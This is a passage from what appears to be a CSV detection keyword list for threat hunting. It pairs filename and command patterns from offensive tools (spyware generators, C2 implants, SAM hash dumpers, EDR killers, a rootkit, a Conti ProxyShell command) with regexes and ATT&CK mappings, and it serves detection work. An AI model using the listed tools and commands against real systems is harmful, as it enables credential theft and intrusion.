Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*saint-1.0-jar-with-dependencies.exe*",".{0,1000}saint\-1\.0\-jar\-with\-dependencies\.exe.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*saint-1.0-jar-with-dependencies.jar*",".{0,1000}saint\-1\.0\-jar\-with\-dependencies\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems 
written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*Salsa-tools*",".{0,1000}Salsa\-tools.{0,1000}","offensive_tool_keyword","Salsa-tools","Salsa Tools - An AV-Safe Reverse Shell dipped on bellota sauce Salsa Tools is a collection of three different tools that combined. allows you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for its execution. In order to avoid the latest detection techniques (AMSI). most of the components were initially written on C#. Salsa Tools was publicly released by Luis Vacas during his Talk Inmersión en la explotación tiene rima which took place during h-c0n in 9th February 2019","T1027 - T1036 - T1059 - T1071 - T1073 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/Hackplayers/Salsa-tools","1","0","N/A","N/A","6","572","133","2020-01-31T22:41:35Z","2019-02-04T21:31:28Z" "*SAM hashes extraction failed: *",".{0,1000}SAM\shashes\sextraction\sfailed\:\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*SAM\*-SAMHashes.txt*",".{0,1000}SAM\\.{0,1000}\-SAMHashes\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*SAM\*-SAMHashes.txt*",".{0,1000}SAM\\.{0,1000}\-SAMHashes\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*SAM\.Sam-Full.txt*",".{0,1000}SAM\\\.Sam\-Full\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*sam_the_admin.py*",".{0,1000}sam_the_admin\.py.{0,1000}","offensive_tool_keyword","sam-the-admin","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1208 - T1218.005 - T1055.002","TA0006 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","0","N/A","N/A","10","959","191","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z" "*SamAdduser.exe*",".{0,1000}SamAdduser\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","413","92","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" "*sambaPipe.py*",".{0,1000}sambaPipe\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*samdump(bearer, commands*",".{0,1000}samdump\(bearer,\scommands.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*samdump.exe*",".{0,1000}samdump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*samdump.py*",".{0,1000}samdump\.py.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - 
T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*samdump.zip*",".{0,1000}samdump\.zip.{0,1000}","offensive_tool_keyword","samdump","Dumping sam","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","1","2","0","2023-04-16T02:15:42Z","2023-04-16T01:49:12Z" "*samdump2 *",".{0,1000}samdump2\s.{0,1000}","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A" "*samdump2 SYSTEM SAM > *",".{0,1000}samdump2\sSYSTEM\sSAM\s\>\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*samdump2 SYSTEM SAM*",".{0,1000}samdump2\sSYSTEM\sSAM.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). 
Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*samdump2.c*",".{0,1000}samdump2\.c.{0,1000}","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A" "*sample_brc4.json*",".{0,1000}sample_brc4\.json.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*sample_files/passwd*",".{0,1000}sample_files\/passwd.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*samr_##*",".{0,1000}samr_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*samratashok/nishang*",".{0,1000}samratashok\/nishang.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*samrdump.py*",".{0,1000}samrdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Sandbox detected - Filename changed :( *",".{0,1000}Sandbox\sdetected\s\-\sFilename\schanged\s\:\(\s.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*sandboxevasion.py*",".{0,1000}sandboxevasion\.py.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","336","85","2024-02-10T13:46:58Z","2022-01-02T22:03:10Z" "*Sandboxie detected!!!*",".{0,1000}Sandboxie\sdetected!!!.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*SAP_GW_RCE_exploit*",".{0,1000}SAP_GW_RCE_exploit.{0,1000}","offensive_tool_keyword","SAP_GW_RCE_exploit","This PoC exploits an ACL misconfiguration in the SAP Gateway (port 33xx) that leads to a Remote Command Execution (RCE).SAPanonGWv1.py is the first version of the exploit based on raw packets sent. It does not require any additional modules (Run and Pwn!) 
SAPanonGWv2.py is the second version of the exploit based on the pysap library","T1078 - T1046 - T1201 - T1021","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/chipik/SAP_GW_RCE_exploit","1","0","N/A","N/A","2","151","52","2020-09-07T13:46:04Z","2019-03-14T13:52:00Z" "*sap2john.pl*",".{0,1000}sap2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*SauronEye.exe*",".{0,1000}SauronEye\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*sc create plumber*warpzoneclient*",".{0,1000}sc\screate\splumber.{0,1000}warpzoneclient.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*sc create Terminator *.sys*",".{0,1000}sc\screate\sTerminator\s.{0,1000}\.sys.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*sc delete plumber*",".{0,1000}sc\sdelete\splumber.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*sc -path c:\inetpub\wwwroot\aspnet_client\test.txt -value teset*",".{0,1000}sc\s\-path\sc\:\\inetpub\\wwwroot\\aspnet_client\\test\.txt\s\-value\steset.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #7","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*sc start nidhogg*",".{0,1000}sc\sstart\snidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red 
teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*sc_inject_direct.exe*",".{0,1000}sc_inject_direct\.exe.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","286","33","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*sc_inject_indirect.exe*",".{0,1000}sc_inject_indirect\.exe.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","286","33","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*sc0tfree*",".{0,1000}sc0tfree.{0,1000}","offensive_tool_keyword","Github Username","github username - Pentester. Red teamer. OSCP. Former wardialer and OKI 900 enthusiast. 
Senior Security Consultant @ctxis hosting offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/sc0tfree","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*scada_default_userpass.txt*",".{0,1000}scada_default_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*scan -T list_of_targets.txt*",".{0,1000}scan\s\-T\slist_of_targets\.txt.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*scan4all -*",".{0,1000}scan4all\s\-.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all
-*.xml*",".{0,1000}scan4all\s\-.{0,1000}\.xml.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all -h*",".{0,1000}scan4all\s\-h.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all -tp *",".{0,1000}scan4all\s\-tp\s.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all.51pwn.com*",".{0,1000}scan4all\.51pwn\.com.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - 
TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all.51pwn.com/*",".{0,1000}scan4all\.51pwn\.com\/.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all_*.*_linux_amd64.zip*",".{0,1000}scan4all_.{0,1000}\..{0,1000}_linux_amd64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all_*.*_macOS_amd64.zip*",".{0,1000}scan4all_.{0,1000}\..{0,1000}_macOS_amd64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all_*.*_macOS_arm64.zip*",".{0,1000}scan4all_.{0,1000}\..{0,1000}_macOS_arm64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 
- T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all_*.*_windows_amd64.zip*",".{0,1000}scan4all_.{0,1000}\..{0,1000}_windows_amd64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all_*_linux_amd64.zip*",".{0,1000}scan4all_.{0,1000}_linux_amd64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all_*_windows_amd64.zip*",".{0,1000}scan4all_.{0,1000}_windows_amd64\.zip.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all_windows_386.exe*",".{0,1000}scan4all_windows_386\.exe.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all_windows_amd64.exe*",".{0,1000}scan4all_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*scan4all-main*",".{0,1000}scan4all\-main.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" 